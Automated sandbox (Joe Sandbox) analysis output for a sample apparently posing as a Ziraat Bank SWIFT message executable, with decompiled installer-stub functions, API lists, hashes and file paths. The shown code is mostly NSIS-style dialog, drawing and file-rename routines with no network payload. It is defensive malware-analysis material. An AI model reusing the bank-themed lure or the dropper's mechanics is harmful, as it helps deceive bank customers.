                                  0x004039a0
                                  0x004039a0
                                  0x004039a9
                                  0x004039b2
                                  0x004039bd
                                  0x004039bd
                                  0x004039c9
                                  0x004039e5
                                  0x004039e8
                                  0x004039fb
                                  0x00403a01
                                  0x00403aa4
                                  0x00000000
                                  0x00403aad
                                  0x00403a07
                                  0x00403a14
                                  0x00403a16
                                  0x00403a18
                                  0x00403a37
                                  0x00403a37
                                  0x00403a3a
                                  0x00403a3f
                                  0x00403a42
                                  0x00403a52
                                  0x00403a53
                                  0x00403a55
                                  0x00403a8b
                                  0x00403a9e
                                  0x00000000
                                  0x00403a9e
                                  0x00403a57
                                  0x00403a5d
                                  0x00403a76
                                  0x00403a7b
                                  0x00403a7d
                                  0x00000000
                                  0x00000000
                                  0x00403a7f
                                  0x00403a6b
                                  0x00403a6b
                                  0x00403a6d
                                  0x00403a6d
                                  0x00000000
                                  0x00403a6d
                                  0x00403a60
                                  0x00403a65
                                  0x00000000
                                  0x00403a65
                                  0x00403a44
                                  0x00403a4a
                                  0x00000000
                                  0x00000000
                                  0x00403a4c
                                  0x00000000
                                  0x00403a4c
                                  0x00403a3c
                                  0x00000000
                                  0x00403a3c
                                  0x00403a22
                                  0x00403a29
                                  0x00403a2f
                                  0x00403a31
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403a31
                                  0x004039ed
                                  0x00000000
                                  0x004039cb
                                  0x004039d1
                                  0x004039db
                                  0x00403de1
                                  0x00403de7
                                  0x00403df4
                                  0x00403dfa
                                  0x00403dfa
                                  0x00403e04
                                  0x00000000
                                  0x00403e04
                                  0x004039c9

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                                  • ShowWindow.USER32(?), ref: 004039BD
                                  • DestroyWindow.USER32 ref: 004039D1
                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
                                  • GetDlgItem.USER32 ref: 00403A0E
                                  • SendMessageA.USER32 ref: 00403A22
                                  • IsWindowEnabled.USER32(00000000), ref: 00403A29
                                  • GetDlgItem.USER32 ref: 00403AD7
                                  • GetDlgItem.USER32 ref: 00403AE1
                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                                  • SendMessageA.USER32 ref: 00403B4C
                                  • GetDlgItem.USER32 ref: 00403BF2
                                  • ShowWindow.USER32(00000000,?), ref: 00403C13
                                  • EnableWindow.USER32(?,?), ref: 00403C25
                                  • EnableWindow.USER32(?,?), ref: 00403C40
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                                  • EnableMenuItem.USER32 ref: 00403C5D
                                  • SendMessageA.USER32 ref: 00403C75
                                  • SendMessageA.USER32 ref: 00403C88
                                  • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                                  • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                                  • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID:
                                  • API String ID: 184305955-0
                                  • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                                  • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                                  • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                                  • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                  				char _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				struct HWND__* _t52;
                                  				long _t86;
                                  				int _t98;
                                  				struct HWND__* _t99;
                                  				signed int _t100;
                                  				intOrPtr _t103;
                                  				intOrPtr _t109;
                                  				int _t110;
                                  				signed int* _t112;
                                  				signed int _t113;
                                  				char* _t114;
                                  				CHAR* _t115;
                                  
                                  				if(_a8 != 0x110) {
                                  					if(_a8 != 0x111) {
                                  						L11:
                                  						if(_a8 != 0x4e) {
                                  							if(_a8 == 0x40b) {
                                  								 *0x420478 =  *0x420478 + 1;
                                  							}
                                  							L25:
                                  							_t110 = _a16;
                                  							L26:
                                  							return E00403E9E(_a8, _a12, _t110);
                                  						}
                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                  						_t110 = _a16;
                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                  							_v12 = _t100;
                                  							_v16 = _t109;
                                  							_v8 = 0x422e40;
                                  							if(_t100 - _t109 < 0x800) {
                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                  								SetCursor(LoadCursorA(0, 0x7f02));
                                  								_t40 =  &_v8; // 0x422e40
                                  								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                  								SetCursor(LoadCursorA(0, 0x7f00));
                                  								_t110 = _a16;
                                  							}
                                  						}
                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                  							goto L26;
                                  						} else {
                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                  								SendMessageA( *0x423ea8, 0x111, 1, 0);
                                  							}
                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                  								SendMessageA( *0x423ea8, 0x10, 0, 0);
                                  							}
                                  							return 1;
                                  						}
                                  					}
                                  					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                                  						goto L25;
                                  					} else {
                                  						_t103 =  *0x41fc68; // 0x0
                                  						_t25 = _t103 + 0x14; // 0x14
                                  						_t112 = _t25;
                                  						if(( *_t112 & 0x00000020) == 0) {
                                  							goto L25;
                                  						}
                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                  						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                  						E0040420A();
                                  						goto L11;
                                  					}
                                  				}
                                  				_t98 = _a16;
                                  				_t113 =  *(_t98 + 0x30);
                                  				if(_t113 < 0) {
                                  					_t113 =  *( *0x42367c - 4 + _t113 * 4);
                                  				}
                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                  				_t114 = _t113 +  *0x423ed8;
                                  				_push(0x22);
                                  				_a16 =  *_t114;
                                  				_v12 = _v12 & 0x00000000;
                                  				_t115 = _t114 + 1;
                                  				_v16 = _t115;
                                  				_v8 = E00403F4B;
                                  				E00403E37(_a4);
                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                  				_push(0x23);
                                  				E00403E37(_a4);
                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                  				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                  				_t99 = GetDlgItem(_a4, 0x3e8);
                                  				E00403E6C(_t99);
                                  				SendMessageA(_t99, 0x45b, 1, 0);
                                  				_t86 =  *( *0x423eb0 + 0x68);
                                  				if(_t86 < 0) {
                                  					_t86 = GetSysColor( ~_t86);
                                  				}
                                  				SendMessageA(_t99, 0x443, 0, _t86);
                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                  				 *0x41f45c =  *0x41f45c & 0x00000000;
                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                  				 *0x420478 =  *0x420478 & 0x00000000;
                                  				return 0;
                                  			}


















                                  0x00403f8f
                                  0x004040b5
                                  0x00404111
                                  0x00404115
                                  0x004041ec
                                  0x004041ee
                                  0x004041ee
                                  0x004041f4
                                  0x004041f4
                                  0x004041f7
                                  0x00000000
                                  0x004041fe
                                  0x00404123
                                  0x00404125
                                  0x0040412f
                                  0x0040413a
                                  0x0040413d
                                  0x00404140
                                  0x0040414b
                                  0x0040414e
                                  0x00404155
                                  0x00404163
                                  0x0040417b
                                  0x00404183
                                  0x0040418e
                                  0x0040419e
                                  0x004041a0
                                  0x004041a0
                                  0x00404155
                                  0x004041aa
                                  0x00000000
                                  0x004041b5
                                  0x004041b9
                                  0x004041ca
                                  0x004041ca
                                  0x004041d0
                                  0x004041de
                                  0x004041de
                                  0x00000000
                                  0x004041e2
                                  0x004041aa
                                  0x004040c0
                                  0x00000000
                                  0x004040d4
                                  0x004040d4
                                  0x004040da
                                  0x004040da
                                  0x004040e0
                                  0x00000000
                                  0x00000000
                                  0x00404105
                                  0x00404107
                                  0x0040410c
                                  0x00000000
                                  0x0040410c
                                  0x004040c0
                                  0x00403f95
                                  0x00403f98
                                  0x00403f9d
                                  0x00403fae
                                  0x00403fae
                                  0x00403fb5
                                  0x00403fb8
                                  0x00403fba
                                  0x00403fbf
                                  0x00403fc8
                                  0x00403fce
                                  0x00403fda
                                  0x00403fdd
                                  0x00403fe6
                                  0x00403feb
                                  0x00403fee
                                  0x00403ff3
                                  0x0040400a
                                  0x00404011
                                  0x00404024
                                  0x00404027
                                  0x0040403c
                                  0x00404043
                                  0x00404048
                                  0x0040404d
                                  0x0040404d
                                  0x0040405c
                                  0x0040406b
                                  0x0040406d
                                  0x00404083
                                  0x00404092
                                  0x00404094
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: @.B$N$open
                                  • API String ID: 3615053054-3815657624
                                  • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                                  • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                                  • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                                  • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                  				struct tagLOGBRUSH _v16;
                                  				struct tagRECT _v32;
                                  				struct tagPAINTSTRUCT _v96;
                                  				struct HDC__* _t70;
                                  				struct HBRUSH__* _t87;
                                  				struct HFONT__* _t94;
                                  				long _t102;
                                  				signed int _t126;
                                  				struct HDC__* _t128;
                                  				intOrPtr _t130;
                                  
                                  				if(_a8 == 0xf) {
                                  					_t130 =  *0x423eb0;
                                  					_t70 = BeginPaint(_a4,  &_v96);
                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                  					_a8 = _t70;
                                  					GetClientRect(_a4,  &_v32);
                                  					_t126 = _v32.bottom;
                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                  					while(_v32.top < _t126) {
                                  						_a12 = _t126 - _v32.top;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                  						_t87 = CreateBrushIndirect( &_v16);
                                  						_v32.bottom = _v32.bottom + 4;
                                  						_a16 = _t87;
                                  						FillRect(_a8,  &_v32, _t87);
                                  						DeleteObject(_a16);
                                  						_v32.top = _v32.top + 4;
                                  					}
                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                  						_a16 = _t94;
                                  						if(_t94 != 0) {
                                  							_t128 = _a8;
                                  							_v32.left = 0x10;
                                  							_v32.top = 8;
                                  							SetBkMode(_t128, 1);
                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                  							_a8 = SelectObject(_t128, _a16);
                                  							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                                  							SelectObject(_t128, _a8);
                                  							DeleteObject(_a16);
                                  						}
                                  					}
                                  					EndPaint(_a4,  &_v96);
                                  					return 0;
                                  				}
                                  				_t102 = _a16;
                                  				if(_a8 == 0x46) {
                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                                  				}
                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                  			}













                                  0x0040100a
                                  0x00401039
                                  0x00401047
                                  0x0040104d
                                  0x00401051
                                  0x0040105b
                                  0x00401061
                                  0x00401064
                                  0x004010f3
                                  0x00401089
                                  0x0040108c
                                  0x004010a6
                                  0x004010bd
                                  0x004010cc
                                  0x004010cf
                                  0x004010d5
                                  0x004010d9
                                  0x004010e4
                                  0x004010ed
                                  0x004010ef
                                  0x004010ef
                                  0x00401100
                                  0x00401105
                                  0x0040110d
                                  0x00401110
                                  0x00401112
                                  0x00401118
                                  0x0040111f
                                  0x00401126
                                  0x00401130
                                  0x00401142
                                  0x00401156
                                  0x00401160
                                  0x00401165
                                  0x00401165
                                  0x00401110
                                  0x0040116e
                                  0x00000000
                                  0x00401178
                                  0x00401010
                                  0x00401013
                                  0x00401015
                                  0x0040101f
                                  0x0040101f
                                  0x00000000

                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                  • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                  • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                  • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004057D3() {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t15;
                                  				long _t16;
                                  				int _t20;
                                  				void* _t28;
                                  				long _t29;
                                  				intOrPtr* _t37;
                                  				int _t43;
                                  				void* _t44;
                                  				long _t47;
                                  				CHAR* _t49;
                                  				void* _t51;
                                  				void* _t53;
                                  				intOrPtr* _t54;
                                  				void* _t55;
                                  				void* _t56;
                                  
                                  				_t15 = E00405DA3(1);
                                  				_t49 =  *(_t55 + 0x18);
                                  				if(_t15 != 0) {
                                  					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                  					if(_t20 != 0) {
                                  						L16:
                                  						 *0x423f30 =  *0x423f30 + 1;
                                  						return _t20;
                                  					}
                                  				}
                                  				 *0x422628 = 0x4c554e;
                                  				if(_t49 == 0) {
                                  					L5:
                                  					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                  						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                                  						_t56 = _t55 + 0x10;
                                  						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                                  						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                                  						_t53 = _t20;
                                  						 *(_t56 + 0x14) = _t53;
                                  						if(_t53 == 0xffffffff) {
                                  							goto L16;
                                  						}
                                  						_t47 = GetFileSize(_t53, 0);
                                  						_t7 = _t43 + 0xa; // 0xa
                                  						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                  						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                  							L15:
                                  							_t20 = CloseHandle(_t53);
                                  							goto L16;
                                  						} else {
                                  							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                                  								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                                  								if(_t28 == 0) {
                                  									L13:
                                  									_t29 = _t47;
                                  									L14:
                                  									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                                  									SetFilePointer(_t53, 0, 0, 0);
                                  									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                  									GlobalFree(_t51);
                                  									goto L15;
                                  								}
                                  								_t37 = _t28 + 1;
                                  								_t44 = _t51 + _t47;
                                  								_t54 = _t37;
                                  								if(_t37 >= _t44) {
                                  									L21:
                                  									_t53 =  *(_t56 + 0x14);
                                  									_t29 = _t37 - _t51;
                                  									goto L14;
                                  								} else {
                                  									goto L20;
                                  								}
                                  								do {
                                  									L20:
                                  									 *((char*)(_t43 + _t54)) =  *_t54;
                                  									_t54 = _t54 + 1;
                                  								} while (_t54 < _t44);
                                  								goto L21;
                                  							}
                                  							E00405A85(_t51 + _t47, "[Rename]\r\n");
                                  							_t47 = _t47 + 0xa;
                                  							goto L13;
                                  						}
                                  					}
                                  				} else {
                                  					CloseHandle(E0040575C(_t49, 0, 1));
                                  					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                  						goto L5;
                                  					}
                                  				}
                                  				return _t16;
                                  			}





















                                  0x004057d9
                                  0x004057e0
                                  0x004057e4
                                  0x004057ed
                                  0x004057f1
                                  0x00405930
                                  0x00405930
                                  0x00000000
                                  0x00405930
                                  0x004057f1
                                  0x004057fd
                                  0x00405813
                                  0x0040583b
                                  0x00405846
                                  0x0040584a
                                  0x0040586a
                                  0x00405871
                                  0x0040587b
                                  0x00405888
                                  0x0040588d
                                  0x00405892
                                  0x00405896
                                  0x00000000
                                  0x00000000
                                  0x004058a5
                                  0x004058a7
                                  0x004058b4
                                  0x004058b8
                                  0x00405929
                                  0x0040592a
                                  0x00000000
                                  0x004058d4
                                  0x004058e1
                                  0x00405946
                                  0x0040594d
                                  0x004058f4
                                  0x004058f4
                                  0x004058f6
                                  0x004058ff
                                  0x0040590a
                                  0x0040591c
                                  0x00405923
                                  0x00000000
                                  0x00405923
                                  0x0040594f
                                  0x00405950
                                  0x00405955
                                  0x00405957
                                  0x00405964
                                  0x00405964
                                  0x00405968
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405959
                                  0x00405959
                                  0x0040595c
                                  0x0040595f
                                  0x00405960
                                  0x00000000
                                  0x00405959
                                  0x004058ec
                                  0x004058f1
                                  0x00000000
                                  0x004058f1
                                  0x004058b8
                                  0x00405815
                                  0x00405820
                                  0x00405829
                                  0x0040582d
                                  0x00000000
                                  0x00000000
                                  0x0040582d
                                  0x0040593a

                                  APIs
                                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                                  • GetShortPathNameA.KERNEL32 ref: 00405829
                                  • GetShortPathNameA.KERNEL32 ref: 00405846
                                  • wsprintfA.USER32 ref: 00405864
                                  • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                                  • GlobalFree.KERNEL32 ref: 00405923
                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                  • String ID: %s=%s$(&B$[Rename]
                                  • API String ID: 3772915668-1834469719
                                  • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                                  • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                                  • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                                  • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405CE3(CHAR* _a4) {
                                  				char _t5;
                                  				char _t7;
                                  				char* _t15;
                                  				char* _t16;
                                  				CHAR* _t17;
                                  
                                  				_t17 = _a4;
                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                  					_t17 =  &(_t17[4]);
                                  				}
                                  				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                                  					_t17 =  &(_t17[2]);
                                  				}
                                  				_t5 =  *_t17;
                                  				_t15 = _t17;
                                  				_t16 = _t17;
                                  				if(_t5 != 0) {
                                  					do {
                                  						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                                  							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                                  							_t16 = CharNextA(_t16);
                                  						}
                                  						_t17 = CharNextA(_t17);
                                  						_t5 =  *_t17;
                                  					} while (_t5 != 0);
                                  				}
                                  				 *_t16 =  *_t16 & 0x00000000;
                                  				while(1) {
                                  					_t16 = CharPrevA(_t15, _t16);
                                  					_t7 =  *_t16;
                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                  						break;
                                  					}
                                  					 *_t16 =  *_t16 & 0x00000000;
                                  					if(_t15 < _t16) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				return _t7;
                                  			}








                                  0x00405ce5
                                  0x00405ced
                                  0x00405d01
                                  0x00405d01
                                  0x00405d07
                                  0x00405d14
                                  0x00405d14
                                  0x00405d15
                                  0x00405d17
                                  0x00405d1b
                                  0x00405d1d
                                  0x00405d26
                                  0x00405d28
                                  0x00405d42
                                  0x00405d4a
                                  0x00405d4a
                                  0x00405d4f
                                  0x00405d51
                                  0x00405d53
                                  0x00405d57
                                  0x00405d58
                                  0x00405d5b
                                  0x00405d63
                                  0x00405d65
                                  0x00405d69
                                  0x00000000
                                  0x00000000
                                  0x00405d6f
                                  0x00405d74
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d74
                                  0x00405d79

                                  APIs
                                  • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                  • CharNextA.USER32(?,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                  • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                  Strings
                                  • "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" , xrefs: 00405CE9
                                  • *?|<>/":, xrefs: 00405D2B
                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
